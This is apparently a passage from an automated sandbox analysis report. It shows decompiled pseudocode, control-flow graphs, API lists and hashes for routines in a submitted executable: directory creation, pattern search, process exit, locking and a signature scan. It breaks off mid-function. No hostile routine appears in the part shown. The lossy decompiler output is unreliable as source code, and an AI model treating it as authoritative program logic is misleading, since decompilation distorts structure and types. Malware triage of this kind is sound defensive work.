                                          • Instruction ID: 1ffdda1e280707f1620b0bff2a1c5a648dc862d45b7bd7d33f28712355ced64d
                                          • Opcode Fuzzy Hash: b6f1e9e35d0993485aac3e7f0f886f6fddc444a62bfdbd27778ba704e600b33b
                                          • Instruction Fuzzy Hash: 7C81677190020AABCF01EFA5C885ADEBBB5BF18318F14416EF455B32A2CB399A05CB54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 98%
                                          			E004049DD(void* __ecx) {
                                          				signed int _t64;
                                          				intOrPtr* _t70;
                                          				intOrPtr* _t74;
                                          				signed char _t75;
                                          				long _t78;
                                          				signed int _t80;
                                          				signed char _t82;
                                          				signed int _t87;
                                          				intOrPtr* _t88;
                                          				void* _t92;
                                          				signed int _t96;
                                          				signed int _t98;
                                          				signed int _t102;
                                          				signed int _t109;
                                          				signed int _t116;
                                          				intOrPtr _t123;
                                          				intOrPtr _t128;
                                          				intOrPtr _t129;
                                          				intOrPtr _t130;
                                          				void* _t132;
                                          				signed int _t135;
                                          				void* _t138;
                                          
                                          				E00413954(E004195A0, _t138);
                                          				E00401C80(_t138 - 0x18, __ecx);
                                          				_t2 = _t138 - 0x14; // 0x414be4
                                          				_t109 =  *_t2;
                                          				 *(_t138 - 4) =  *(_t138 - 4) & 0x00000000;
                                          				_t132 = 0x5c;
                                          				if(_t109 == 0) {
                                          					L13:
                                          					E00401CE1(_t138 - 0x24, _t138 - 0x18);
                                          					_t14 = _t138 - 0x14; // 0x414be4
                                          					_t135 =  *_t14;
                                          					 *(_t138 - 4) = 1;
                                          					while(1) {
                                          						L14:
                                          						_t64 = E0040499C( *((intOrPtr*)(_t138 - 0x18))); // executed
                                          						__eflags = _t64;
                                          						if(_t64 != 0) {
                                          							break;
                                          						}
                                          						_t78 = GetLastError();
                                          						__eflags = _t78 - 0xb7;
                                          						if(_t78 == 0xb7) {
                                          							E00402EE1(_t138 - 0x40);
                                          							_push( *((intOrPtr*)(_t138 - 0x18)));
                                          							 *(_t138 - 4) = 2;
                                          							_t80 = E00405841(_t138 - 0x68, _t128); // executed
                                          							__eflags = _t80;
                                          							if(_t80 != 0) {
                                          								_t82 =  *(_t138 - 0x48) >> 4;
                                          								__eflags = _t82 & 0x00000001;
                                          								if((_t82 & 0x00000001) != 0) {
                                          									 *(_t138 - 4) = 1;
                                          									E00403A9C( *((intOrPtr*)(_t138 - 0x40)));
                                          									break;
                                          								} else {
                                          									_t102 = 0;
                                          									__eflags = 0;
                                          									goto L31;
                                          								}
                                          							} else {
                                          								_t102 = 1;
                                          								L31:
                                          								E00403A9C( *((intOrPtr*)(_t138 - 0x40)));
                                          								E00403A9C( *((intOrPtr*)(_t138 - 0x24)));
                                          								E00403A9C( *((intOrPtr*)(_t138 - 0x18)));
                                          							}
                                          						} else {
                                          							_t17 = _t138 - 0x14; // 0x414be4
                                          							_t87 =  *_t17;
                                          							__eflags = _t87;
                                          							if(_t87 == 0) {
                                          								L44:
                                          								_t102 = 0;
                                          								__eflags = 0;
                                          								L45:
                                          								E00403A9C( *((intOrPtr*)(_t138 - 0x24)));
                                          								_t129 =  *((intOrPtr*)(_t138 - 0x18));
                                          								goto L46;
                                          							} else {
                                          								_t123 =  *((intOrPtr*)(_t138 - 0x18));
                                          								_t88 = _t123 + _t87 * 2 - 2;
                                          								while(1) {
                                          									__eflags =  *_t88 - _t132;
                                          									if( *_t88 == _t132) {
                                          										break;
                                          									}
                                          									__eflags = _t88 - _t123;
                                          									if(_t88 == _t123) {
                                          										_t135 = _t135 | 0xffffffff;
                                          										__eflags = _t135;
                                          									} else {
                                          										_t88 = _t88;
                                          										continue;
                                          									}
                                          									L23:
                                          									__eflags = _t135;
                                          									if(__eflags < 0 || __eflags == 0) {
                                          										goto L44;
                                          									} else {
                                          										__eflags =  *((short*)(_t123 + _t135 * 2 - 2)) - 0x3a;
                                          										if( *((short*)(_t123 + _t135 * 2 - 2)) == 0x3a) {
                                          											goto L44;
                                          										} else {
                                          											_t92 = E00401E3A(_t138 - 0x18, _t138 - 0x30, _t135);
                                          											 *(_t138 - 4) = 3;
                                          											E00401D7A(_t138 - 0x18, _t92);
                                          											 *(_t138 - 4) = 1;
                                          											E00403A9C( *((intOrPtr*)(_t138 - 0x30)));
                                          											goto L14;
                                          										}
                                          									}
                                          									goto L47;
                                          								}
                                          								_t135 = _t88 - _t123 >> 1;
                                          								goto L23;
                                          							}
                                          						}
                                          						goto L47;
                                          					}
                                          					E00401D7A(_t138 - 0x18, _t138 - 0x24);
                                          					while(1) {
                                          						L34:
                                          						_t45 = _t138 - 0x14; // 0x414be4
                                          						__eflags = _t135 -  *_t45;
                                          						if(_t135 >=  *_t45) {
                                          							break;
                                          						}
                                          						_t130 =  *((intOrPtr*)(_t138 - 0x18));
                                          						_t70 = _t130 + 2 + _t135 * 2;
                                          						while(1) {
                                          							_t116 =  *_t70;
                                          							__eflags = _t116 - _t132;
                                          							if(_t116 == _t132) {
                                          								break;
                                          							}
                                          							__eflags = _t116;
                                          							if(_t116 == 0) {
                                          								_t135 = _t135 | 0xffffffff;
                                          								__eflags = _t135;
                                          							} else {
                                          								_t70 = _t70 + 2;
                                          								continue;
                                          							}
                                          							L41:
                                          							__eflags = _t135;
                                          							if(_t135 < 0) {
                                          								_t50 = _t138 - 0x14; // 0x414be4
                                          								_t135 =  *_t50;
                                          							}
                                          							_t74 = E00401E3A(_t138 - 0x18, _t138 - 0x30, _t135);
                                          							 *(_t138 - 4) = 4;
                                          							_t75 = E0040499C( *_t74);
                                          							 *(_t138 - 4) = 1;
                                          							asm("sbb bl, bl");
                                          							E00403A9C( *((intOrPtr*)(_t138 - 0x30)));
                                          							__eflags =  ~_t75 + 1;
                                          							if( ~_t75 + 1 == 0) {
                                          								goto L34;
                                          							} else {
                                          								goto L44;
                                          							}
                                          							goto L45;
                                          						}
                                          						_t135 = _t70 - _t130 >> 1;
                                          						goto L41;
                                          					}
                                          					_t102 = 1;
                                          					goto L45;
                                          				} else {
                                          					_t128 =  *((intOrPtr*)(_t138 - 0x18));
                                          					_t96 = _t128 + _t109 * 2 - 2;
                                          					while( *_t96 != _t132) {
                                          						if(_t96 == _t128) {
                                          							_t98 = _t96 | 0xffffffff;
                                          							__eflags = _t98;
                                          						} else {
                                          							_t96 = _t96;
                                          							continue;
                                          						}
                                          						L7:
                                          						__eflags = _t98;
                                          						if(_t98 <= 0) {
                                          							goto L13;
                                          						} else {
                                          							__eflags = _t98 - _t109 - 1;
                                          							if(_t98 != _t109 - 1) {
                                          								goto L13;
                                          							} else {
                                          								__eflags = _t109 - 3;
                                          								if(_t109 != 3) {
                                          									L12:
                                          									E004023EE(_t138 - 0x18, _t98, 1);
                                          									goto L13;
                                          								} else {
                                          									__eflags =  *((short*)(_t128 + 2)) - 0x3a;
                                          									if( *((short*)(_t128 + 2)) != 0x3a) {
                                          										goto L12;
                                          									} else {
                                          										_t102 = 1;
                                          										L46:
                                          										E00403A9C(_t129);
                                          									}
                                          								}
                                          							}
                                          						}
                                          						goto L47;
                                          					}
                                          					_t98 = _t96 - _t128 >> 1;
                                          					goto L7;
                                          				}
                                          				L47:
                                          				 *[fs:0x0] =  *((intOrPtr*)(_t138 - 0xc));
                                          				return _t102;
                                          			}

                                          APIs
                                          • __EH_prolog.LIBCMT ref: 004049E2
                                          • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00404A6D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: ErrorH_prologLast
                                          • String ID: KA
                                          • API String ID: 1057991267-4133974868
                                          • Opcode ID: 17c35cf8e9a7414348f32529b6738b26766f9c2a34e08f9ad75d03fbdc4fbc32
                                          • Instruction ID: ea88e0dbf276ed2b61ac96949af9a946984d9cda694903235269fb2a0f105987
                                          • Opcode Fuzzy Hash: 17c35cf8e9a7414348f32529b6738b26766f9c2a34e08f9ad75d03fbdc4fbc32
                                          • Instruction Fuzzy Hash: 14512671A4010A9ACF10EBA0C945AFFBB74EF91318F14017BE601732D1D779AE46CB99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 1028 401af4-401b2e call 413954 call 413cc0 call 405b6d 1035 401b30-401b3e call 405975 1028->1035 1036 401b43-401b49 1028->1036 1043 401c6b-401c78 1035->1043 1038 401b57-401b60 1036->1038 1039 401b4b-401b55 1036->1039 1041 401b62-401b6c 1038->1041 1042 401b6e-401b7b 1038->1042 1039->1038 1039->1039 1041->1041 1041->1042 1044 401b7f-401b96 call 405bca 1042->1044 1046 401b9b-401b9d 1044->1046 1047 401ba3-401ba8 1046->1047 1048 401c5a 1046->1048 1049 401c56-401c58 1047->1049 1050 401bae-401bb0 1047->1050 1051 401c5c-401c6a call 405975 1048->1051 1049->1051 1052 401bb6-401bbc 1050->1052 1051->1043 1054 401bf0-401bf5 1052->1054 1055 401bbe-401bc3 1052->1055 1058 401c16-401c3b call 413980 1054->1058 1059 401bf7-401c08 call 4134d0 1054->1059 1057 401bc5-401bd6 call 4134d0 1055->1057 1055->1058 1057->1049 1070 401bd8-401bdf 1057->1070 1068 401c4a-401c54 1058->1068 1069 401c3d-401c44 1058->1069 1066 401c0a-401c14 1059->1066 1067 401bec-401bee 1059->1067 1066->1052 1067->1052 1068->1051 1069->1068 1071 401b7d 1069->1071 1070->1048 1072 401be1-401be7 call 401ee5 1070->1072 1071->1044 1072->1067
                                          C-Code - Quality: 93%
                                          			E00401AF4(void* __ecx, intOrPtr __edx, void* __eflags) {
                                          				signed char** _t64;
                                          				char* _t67;
                                          				void* _t71;
                                          				signed int _t73;
                                          				intOrPtr _t74;
                                          				void* _t75;
                                          				void* _t81;
                                          				void* _t83;
                                          				char _t84;
                                          				signed int _t89;
                                          				signed int _t91;
                                          				void* _t92;
                                          				signed int _t103;
                                          				void* _t107;
                                          				void* _t109;
                                          				void* _t110;
                                          				void* _t112;
                                          
                                          				_t92 = __ecx;
                                          				E00413954(E004190C8, _t110);
                                          				E00413CC0(0x1024, __ecx);
                                          				_t64 =  *(_t110 + 0xc);
                                          				_t103 = 0;
                                          				_t64[1] = 0;
                                          				 *((intOrPtr*)(_t110 - 0x30)) = __edx;
                                          				 *( *_t64) =  *( *_t64) & 0x00000000;
                                          				 *(_t110 - 0x1c) =  *(_t110 - 0x1c) | 0xffffffff;
                                          				 *(_t110 - 4) = 0;
                                          				if(E00405B6D(_t92) != 0) {
                                          					 *((intOrPtr*)(_t110 - 0x14)) = 0;
                                          					if( *((char*)(__edx)) != 0) {
                                          						do {
                                          							 *((intOrPtr*)(_t110 - 0x14)) =  *((intOrPtr*)(_t110 - 0x14)) + 1;
                                          						} while ( *((char*)( *((intOrPtr*)(_t110 - 0x14)) + __edx)) != 0);
                                          					}
                                          					_t67 =  *((intOrPtr*)(_t110 + 8));
                                          					 *((intOrPtr*)(_t110 - 0x18)) = _t103;
                                          					if( *_t67 != 0) {
                                          						do {
                                          							 *((intOrPtr*)(_t110 - 0x18)) =  *((intOrPtr*)(_t110 - 0x18)) + 1;
                                          						} while ( *((char*)( *((intOrPtr*)(_t110 - 0x18)) + _t67)) != 0);
                                          					}
                                          					_t107 = 0;
                                          					 *(_t110 - 0xd) =  *(_t110 - 0xd) & 0x00000000;
                                          					 *((intOrPtr*)(_t110 - 0x24)) = _t103;
                                          					 *((intOrPtr*)(_t110 - 0x20)) = _t103;
                                          					while(1) {
                                          						L8:
                                          						_t71 = E00405BCA(_t110 - 0x1c, _t110 + _t107 - 0x1030, 0x1000 - _t107, _t110 - 0x28); // executed
                                          						if(_t71 == 0) {
                                          							break;
                                          						}
                                          						_t74 =  *((intOrPtr*)(_t110 - 0x28));
                                          						if(_t74 == _t103) {
                                          							L23:
                                          							_t89 = 1;
                                          						} else {
                                          							_t109 = _t107 + _t74;
                                          							_t91 = _t110 - 0x1030;
                                          							while(1) {
                                          								_t75 = _t109;
                                          								if( *(_t110 - 0xd) != 0) {
                                          								}
                                          								L12:
                                          								if(_t103 > _t75 -  *((intOrPtr*)(_t110 - 0x18))) {
                                          									L20:
                                          									_t107 = _t109 - _t103;
                                          									 *((intOrPtr*)(_t110 - 0x24)) =  *((intOrPtr*)(_t110 - 0x24)) + _t103;
                                          									asm("adc dword [ebp-0x20], 0x0");
                                          									E00413980(_t110 - 0x1030, _t110 + _t103 - 0x1030, _t107);
                                          									_t112 = _t112 + 0xc;
                                          									if( *((intOrPtr*)(_t110 - 0x20)) > 0 ||  *((intOrPtr*)(_t110 - 0x24)) > 0x100000) {
                                          										_t89 = _t91 & 0xffffff00 | ( *(_t110 + 0xc))[1] == 0x00000000;
                                          									} else {
                                          										_t103 = 0;
                                          										goto L8;
                                          									}
                                          								} else {
                                          									_t83 = E004134D0(_t91,  *((intOrPtr*)(_t110 + 8)),  *((intOrPtr*)(_t110 - 0x18)));
                                          									_t112 = _t112 + 0xc;
                                          									if(_t83 == 0) {
                                          										goto L23;
                                          									} else {
                                          										_t84 =  *_t91;
                                          										 *((char*)(_t110 - 0x2c)) = _t84;
                                          										if(_t84 == 0) {
                                          											goto L24;
                                          										} else {
                                          											E00401EE5( *(_t110 + 0xc),  *((intOrPtr*)(_t110 - 0x2c)));
                                          											L16:
                                          											_t103 = _t103 + 1;
                                          											_t91 = _t91 + 1;
                                          											while(1) {
                                          												_t75 = _t109;
                                          												if( *(_t110 - 0xd) != 0) {
                                          												}
                                          												goto L17;
                                          											}
                                          											goto L12;
                                          										}
                                          									}
                                          								}
                                          								goto L25;
                                          								L17:
                                          								_t39 = _t110 - 0x14; // 0x414be4
                                          								if(_t103 > _t75 -  *_t39) {
                                          									goto L20;
                                          								} else {
                                          									_t40 = _t110 - 0x14; // 0x414be4
                                          									_t81 = E004134D0(_t91,  *((intOrPtr*)(_t110 - 0x30)),  *_t40);
                                          									_t112 = _t112 + 0xc;
                                          									if(_t81 != 0) {
                                          										goto L16;
                                          									} else {
                                          										_t103 = _t103 +  *((intOrPtr*)(_t110 - 0x14));
                                          										_t91 = _t91 +  *((intOrPtr*)(_t110 - 0x14));
                                          										 *(_t110 - 0xd) = 1;
                                          										continue;
                                          									}
                                          									goto L26;
                                          								}
                                          								goto L25;
                                          							}
                                          						}
                                          						L25:
                                          						 *(_t110 - 4) =  *(_t110 - 4) | 0xffffffff;
                                          						E00405975(_t110 - 0x1c);
                                          						_t73 = _t89;
                                          						goto L26;
                                          					}
                                          					L24:
                                          					_t89 = 0;
                                          					goto L25;
                                          				} else {
                                          					 *(_t110 - 4) =  *(_t110 - 4) | 0xffffffff;
                                          					E00405975(_t110 - 0x1c);
                                          					_t73 = 0;
                                          				}
                                          				L26:
                                          				 *[fs:0x0] =  *((intOrPtr*)(_t110 - 0xc));
                                          				return _t73;
                                          			}

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID: KA$KA
                                          • API String ID: 3519838083-594506476
                                          • Opcode ID: 5b0f55770afa12d36702e97ef3d2b3e48a7f6e08a164a6161b21258ea26ce881
                                          • Instruction ID: 3866b3b7da3d7396f9922ec017f7e66c93d936b9f161a27d318f0a0663603341
                                          • Opcode Fuzzy Hash: 5b0f55770afa12d36702e97ef3d2b3e48a7f6e08a164a6161b21258ea26ce881
                                          • Instruction Fuzzy Hash: 7451CF72D042199FDF11DFA4C940BEEBBB4AF05394F14416AE851732E2E3789E85CB68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1074 416cb8-416cc7 call 416d5d 1077 416cc9-416cd4 GetCurrentProcess TerminateProcess 1074->1077 1078 416cda-416cf0 1074->1078 1077->1078 1079 416cf2-416cf9 1078->1079 1080 416d2e-416d42 call 416d6f 1078->1080 1082 416cfb-416d07 1079->1082 1083 416d1d-416d2d call 416d6f 1079->1083 1089 416d44-416d4a call 416d66 1080->1089 1090 416d4b-416d55 ExitProcess 1080->1090 1086 416d09-416d0d 1082->1086 1087 416d1c 1082->1087 1083->1080 1091 416d11-416d1a 1086->1091 1092 416d0f 1086->1092 1087->1083 1091->1086 1091->1087 1092->1091
                                          C-Code - Quality: 80%
                                          			E00416CB8(void* __esi, int _a4, intOrPtr _a8, char _a12) {
                                          				intOrPtr _t9;
                                          				intOrPtr* _t11;
                                          				char _t16;
                                          				intOrPtr _t22;
                                          				intOrPtr _t23;
                                          				void* _t24;
                                          				intOrPtr* _t25;
                                          				void* _t27;
                                          				void* _t32;
                                          
                                          				_t24 = __esi;
                                          				E00416D5D();
                                          				_t23 = 1;
                                          				_t27 =  *0x423400 - _t23; // 0x1
                                          				if(_t27 == 0) {
                                          					TerminateProcess(GetCurrentProcess(), _a4);
                                          				}
                                          				_t16 = _a12;
                                          				 *0x4233fc = _t23;
                                          				 *0x4233f8 = _t16;
                                          				if(_a8 == 0) {
                                          					_t9 =  *0x425a10; // 0x7704c8
                                          					if(_t9 != 0) {
                                          						_t22 =  *0x425a0c; // 0x7704d0
                                          						_push(_t24);
                                          						_t4 = _t22 - 4; // 0x7704cc
                                          						_t25 = _t4;
                                          						if(_t25 >= _t9) {
                                          							do {
                                          								_t11 =  *_t25;
                                          								if(_t11 != 0) {
                                          									 *_t11();
                                          								}
                                          								_t25 = _t25 - 4;
                                          								_t32 = _t25 -  *0x425a10; // 0x7704c8
                                          							} while (_t32 >= 0);
                                          						}
                                          					}
                                          					E00416D6F(0x420044, 0x420048);
                                          				}
                                          				E00416D6F(0x42004c, 0x420054);
                                          				if(_t16 == 0) {
                                          					 *0x423400 = _t23; // executed
                                          					ExitProcess(_a4);
                                          				}
                                          				return E00416D66();
                                          			}

                                          APIs
                                          • GetCurrentProcess.KERNEL32(?,?,00416CA3,?,00000000,00000000,00414BED,00000000,00000000), ref: 00416CCD
                                          • TerminateProcess.KERNEL32(00000000,?,00416CA3,?,00000000,00000000,00414BED,00000000,00000000), ref: 00416CD4
                                          • ExitProcess.KERNEL32 ref: 00416D55
                                          Similarity
                                          • API ID: Process$CurrentExitTerminate
                                          • String ID:
                                          • API String ID: 1703294689-0
                                          • Opcode ID: 88460fada53f43c142527d69cfd7889c6f43d20f3130cd5a4fa53c970b5b43b0
                                          • Instruction ID: 207b1b8771569bb39d21ff3be241c2a042127402aedffa1bc22b33ac5a943006
                                          • Opcode Fuzzy Hash: 88460fada53f43c142527d69cfd7889c6f43d20f3130cd5a4fa53c970b5b43b0
                                          • Instruction Fuzzy Hash: 7A01C4323002119BD630AF69FC86A9A7BA5FB41715BA2802FF45057151DB7CD8C28B5D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1095 407093-4070c7 call 413954 EnterCriticalSection call 4065b2 1099 4070c9-4070d7 call 406505 1095->1099 1100 4070da-4070f2 LeaveCriticalSection 1095->1100 1099->1100
                                          C-Code - Quality: 100%
                                          			E00407093(intOrPtr* __ecx) {
                                          				intOrPtr* _t15;
                                          				void* _t16;
                                          				void* _t22;
                                          				struct _CRITICAL_SECTION* _t23;
                                          				void* _t25;
                                          				intOrPtr* _t26;
                                          				intOrPtr* _t29;
                                          				void* _t30;
                                          
                                          				E00413954(E00419874, _t30);
                                          				_t26 = __ecx;
                                          				_t23 = __ecx + 4;
                                          				 *(_t30 - 0x10) = _t23;
                                          				EnterCriticalSection(_t23);
                                          				_t15 =  *_t26;
                                          				 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
                                          				_t16 =  *((intOrPtr*)( *_t15 + 0x10))(_t15,  *((intOrPtr*)(_t30 + 8)),  *((intOrPtr*)(_t30 + 0xc)), 0, 0, _t22, _t25, __ecx);
                                          				if(_t16 == 0) {
                                          					_t29 =  *_t26;
                                          					_t16 =  *((intOrPtr*)( *_t29 + 0xc))(_t29,  *((intOrPtr*)(_t30 + 0x10)),  *((intOrPtr*)(_t30 + 0x14)),  *((intOrPtr*)(_t30 + 0x18)));
                                          				}
                                          				LeaveCriticalSection(_t23);
                                          				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
                                          				return _t16;
                                          			}

                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00407098
                                          • EnterCriticalSection.KERNEL32(00000000,?,?,?,00407122,?,?,?,?,?), ref: 004070A9
                                          • LeaveCriticalSection.KERNEL32(00000000,?,?,?,00407122,?,?,?,?,?), ref: 004070DD
                                          Similarity
                                          • API ID: CriticalSection$EnterH_prologLeave
                                          • String ID:
                                          • API String ID: 367238759-0
                                          • Opcode ID: 0cda8505b6e8737534b09afe540dc97e47590bc95c9c3e0b1678985bbac2a5b2
                                          • Instruction ID: a56bdc6fde0de93627b634a906b5586fd045a2fb55df8f4462ae58feb39c4b8d
                                          • Opcode Fuzzy Hash: 0cda8505b6e8737534b09afe540dc97e47590bc95c9c3e0b1678985bbac2a5b2
                                          • Instruction Fuzzy Hash: D7018176A00204EFCB118F94CC08B9ABBB5FF48715F00841AFD12E7250C3B4A910CFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1103 40dd8b-40ddb0 call 413954 call 40776f 1108 40ddb6-40ddbf call 40df2c 1103->1108 1109 40df1b-40df29 1103->1109 1112 40ddc1-40ddc3 1108->1112 1113 40ddc8-40ddfe call 4076d5 call 414090 1108->1113 1112->1109 1118 40de01-40de06 1113->1118 1119 40de25-40de47 call 406505 1118->1119 1120 40de08-40de15 1118->1120 1127 40df07 1119->1127 1128 40de4d-40de55 1119->1128 1121 40decb-40dece 1120->1121 1122 40de1b 1120->1122 1123 40df09-40df19 call 403a9c 1121->1123 1122->1119 1124 40de1d-40de1f 1122->1124 1123->1109 1124->1119 1124->1121 1127->1123 1128->1121 1130 40de57-40de5b 1128->1130 1130->1119 1131 40de5d-40de6d 1130->1131 1132 40dec6-40dec9 1131->1132 1133 40de6f 1131->1133 1134 40deaa-40dec1 call 413980 1132->1134 1135 40de77 1133->1135 1134->1118 1136 40de7a-40de7e 1135->1136 1138 40de80-40de82 1136->1138 1139 40de8a 1136->1139 1141 40de84-40de88 1138->1141 1142 40de8c 1138->1142 1139->1142 1141->1136 1142->1134 1143 40de8e-40de97 call 40df2c 1142->1143 1146 40ded0-40df04 call 414090 call 4065b2 1143->1146 1147 40de99-40dea2 1143->1147 1146->1127 1149 40de71-40de74 1147->1149 1150 40dea4-40dea7 1147->1150 1149->1135 1150->1134
                                          C-Code - Quality: 95%
                                          			E0040DD8B(void* __ecx, void* __eflags) {
                                          				intOrPtr _t57;
                                          				intOrPtr _t65;
                                          				intOrPtr _t67;
                                          				intOrPtr _t69;
                                          				intOrPtr _t71;
                                          				intOrPtr* _t75;
                                          				intOrPtr* _t80;
                                          				void* _t83;
                                          				intOrPtr _t85;
                                          				intOrPtr _t93;
                                          				void* _t95;
                                          				void* _t98;
                                          				intOrPtr* _t100;
                                          				intOrPtr _t104;
                                          				intOrPtr _t107;
                                          				intOrPtr _t109;
                                          				intOrPtr _t110;
                                          				intOrPtr* _t111;
                                          				void* _t113;
                                          				intOrPtr _t115;
                                          				void* _t116;
                                          				void* _t118;
                                          				void* _t119;
                                          				void* _t121;
                                          
                                          				E00413954(E0041A630, _t116);
                                          				_t119 = _t118 - 0x20;
                                          				_t113 = __ecx;
                                          				_t83 = __ecx + 0x28;
                                          				_t107 = 0x20;
                                          				_t57 = E0040776F(__eflags, _t107); // executed
                                          				if(_t57 == 0) {
                                          					if(E0040DF2C(_t83) == 0) {
                                          						__eflags = 0;
                                          						 *((intOrPtr*)(_t116 - 0x2c)) = 0x41b818;
                                          						 *((intOrPtr*)(_t116 - 0x28)) = 0;
                                          						 *((intOrPtr*)(_t116 - 0x24)) = 0;
                                          						 *((intOrPtr*)(_t116 - 4)) = 0;
                                          						E004076D5(_t116 - 0x2c, 0x10000);
                                          						 *((intOrPtr*)(_t116 - 0x18)) =  *((intOrPtr*)(_t116 - 0x24));
                                          						 *((intOrPtr*)(_t116 - 0x10)) = _t107;
                                          						E00414090( *((intOrPtr*)(_t116 - 0x24)), _t83, _t107);
                                          						_t109 =  *((intOrPtr*)(_t113 + 0x20));
                                          						_t85 =  *((intOrPtr*)(_t113 + 0x24));
                                          						_t121 = _t119 + 0xc;
                                          						while(1) {
                                          							L4:
                                          							_t100 =  *((intOrPtr*)(_t116 + 0xc));
                                          							__eflags = _t100;
                                          							if(_t100 == 0) {
                                          								goto L8;
                                          							}
                                          							_t95 = _t109 -  *((intOrPtr*)(_t113 + 0x20));
                                          							asm("sbb eax, [esi+0x24]");
                                          							__eflags = _t85 -  *((intOrPtr*)(_t100 + 4));
                                          							if(__eflags > 0) {
                                          								L25:
                                          								_t115 = 1;
                                          							} else {
                                          								if(__eflags < 0) {
                                          									goto L8;
                                          								} else {
                                          									__eflags = _t95 -  *_t100;
                                          									if(_t95 >  *_t100) {
                                          										goto L25;
                                          									} else {
                                          										while(1) {
                                          											L8:
                                          											_t65 =  *((intOrPtr*)(_t116 - 0x10));
                                          											_t67 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t116 + 8)))) + 0xc))( *((intOrPtr*)(_t116 + 8)), _t65 +  *((intOrPtr*)(_t116 - 0x18)), 0x10000 - _t65, _t116 - 0x20);
                                          											__eflags = _t67;
                                          											if(_t67 != 0) {
                                          												break;
                                          											}
                                          											_t69 =  *((intOrPtr*)(_t116 - 0x20));
                                          											 *((intOrPtr*)(_t116 - 0x10)) =  *((intOrPtr*)(_t116 - 0x10)) + _t69;
                                          											__eflags = _t69;
                                          											if(_t69 == 0) {
                                          												goto L25;
                                          											} else {
                                          												__eflags =  *((intOrPtr*)(_t116 - 0x10)) - 0x20;
                                          												if( *((intOrPtr*)(_t116 - 0x10)) <= 0x20) {
                                          													continue;
                                          												} else {
                                          													_t104 = 0;
                                          													_t71 =  *((intOrPtr*)(_t116 - 0x10)) + 0xffffffe0;
                                          													 *((intOrPtr*)(_t116 - 0x14)) = 0;
                                          													__eflags = _t71;
                                          													 *((intOrPtr*)(_t116 - 0x1c)) = _t71;
                                          													if(_t71 <= 0) {
                                          														_t93 =  *((intOrPtr*)(_t116 - 0x18));
                                          														goto L23;
                                          													} else {
                                          														while(1) {
                                          															_t93 =  *((intOrPtr*)(_t116 - 0x18));
                                          															while(1) {
                                          																L15:
                                          																__eflags =  *((char*)(_t104 + _t93)) - 0x37;
                                          																if( *((char*)(_t104 + _t93)) == 0x37) {
                                          																	break;
                                          																}
                                          																__eflags = _t104 - _t71;
                                          																if(__eflags < 0) {
                                          																	_t104 = _t104 + 1;
                                          																	 *((intOrPtr*)(_t116 - 0x14)) = _t104;
                                          																	continue;
                                          																}
                                          																L19:
                                          																if(__eflags == 0) {
                                          																	L23:
                                          																	_t109 = _t109 + _t71;
                                          																	asm("adc ebx, 0x0");
                                          																	 *((intOrPtr*)(_t116 - 0x10)) =  *((intOrPtr*)(_t116 - 0x10)) - _t71;
                                          																	E00413980(_t93, _t71 + _t93,  *((intOrPtr*)(_t116 - 0x10)));
                                          																	_t121 = _t121 + 0xc;
                                          																	goto L4;
                                          																} else {
                                          																	_t75 = E0040DF2C(_t93 + _t104);
                                          																	__eflags = _t75;
                                          																	if(_t75 != 0) {
                                          																		E00414090(_t113 + 0x28,  *((intOrPtr*)(_t116 - 0x14)) +  *((intOrPtr*)(_t116 - 0x18)), 0x20);
                                          																		_t110 = _t109 +  *((intOrPtr*)(_t116 - 0x14));
                                          																		_t80 =  *((intOrPtr*)(_t116 + 8));
                                          																		 *((intOrPtr*)(_t113 + 0x20)) = _t110;
                                          																		_t98 = 0;
                                          																		asm("adc ebx, ecx");
                                          																		_t111 = _t110 + 0x20;
                                          																		__eflags = _t111;
                                          																		 *((intOrPtr*)(_t113 + 0x24)) = _t85;
                                          																		asm("adc ebx, ecx");
                                          																		_t67 =  *((intOrPtr*)( *_t80 + 0x10))(_t80, _t111, _t85, _t98, _t98);
                                          																		goto L27;
                                          																	} else {
                                          																		 *((intOrPtr*)(_t116 - 0x14)) =  *((intOrPtr*)(_t116 - 0x14)) + 1;
